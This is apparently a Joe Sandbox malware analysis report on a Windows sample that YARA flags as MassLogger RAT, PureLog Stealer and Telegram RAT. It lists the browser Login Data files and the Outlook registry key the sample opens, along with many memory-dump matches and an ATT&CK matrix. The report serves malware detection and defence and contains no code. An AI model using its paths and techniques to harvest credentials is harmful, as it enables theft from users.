Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029C8B38 GetLocalTime,

0_2_029C8B38

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029D9F00 GetUserNameA,

0_2_029D9F00

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029CB038 GetVersionExA,

0_2_029CB038

Source: C:\Users\user\Links\dajivhqI.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Links\dajivhqI.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Links\dajivhqI.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	4 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	11 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report y79a2l1FY5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
y79a2l1FY5.exe